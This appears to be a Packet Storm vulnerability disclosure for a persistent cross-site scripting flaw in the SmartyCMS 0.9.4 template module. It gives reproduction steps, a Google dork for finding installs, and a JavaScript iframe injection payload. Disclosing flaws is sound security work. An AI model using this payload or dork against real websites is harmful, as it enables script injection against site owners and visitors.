SmartyCMS version 0.9.4 suffers from a cross site scripting vulnerability in the template module.
3805f965b9dce94554411cc59a2a33f1e57d235ef1aa6e4fe89e2a264fc7f8c3 TITLE: SmartyCMS 0.9.4 Template module Persistent XSS
vendor: SmartyCMS
Author: r007k17-w
Email: n4gb07@gmail.com
My blog: http://shadowrootkit.wordpress.com/
Google Dork: Copyright 2007 by SmartyCMS 0.9.4 built 334
-------------------------------------------------------------------------------------------------------------------------------------------
DOWNLOAD FILE:
http://sourceforge.net/project/platformdownload.php?group_id=195556
DEMO: 1.http://localhost/smartycms-0.9.4-334/index.php?page=demo&
2.select 'Example01-Template Module'
3.Click on 'template module' tab
4.Edit title bar of the window and Inject JavaScript/HTML
POSTDATA: "><IFRAME SRC="javascript:alert('XSS');"></IFRAME>
------------------------------------------------------------------------------------------------------------------------------------------------
gr33t1ngs & SH0uTz to s1d3-3ff3cts,L0rd CrUs4d3r,3ps1lonl4mbd4,A1-w1n6(
N17|< ),1nJ3ct0r t3am and all my friends
------------------------------------------------------------------------------------------------------------
© 2022 Packet Storm. All rights reserved.
%7Cutmcsr%3D(direct)%7Cutmcmd%3D(none)){kind=small}
Follow us on Twitter
Follow us on Facebook
Subscribe to an RSS Feed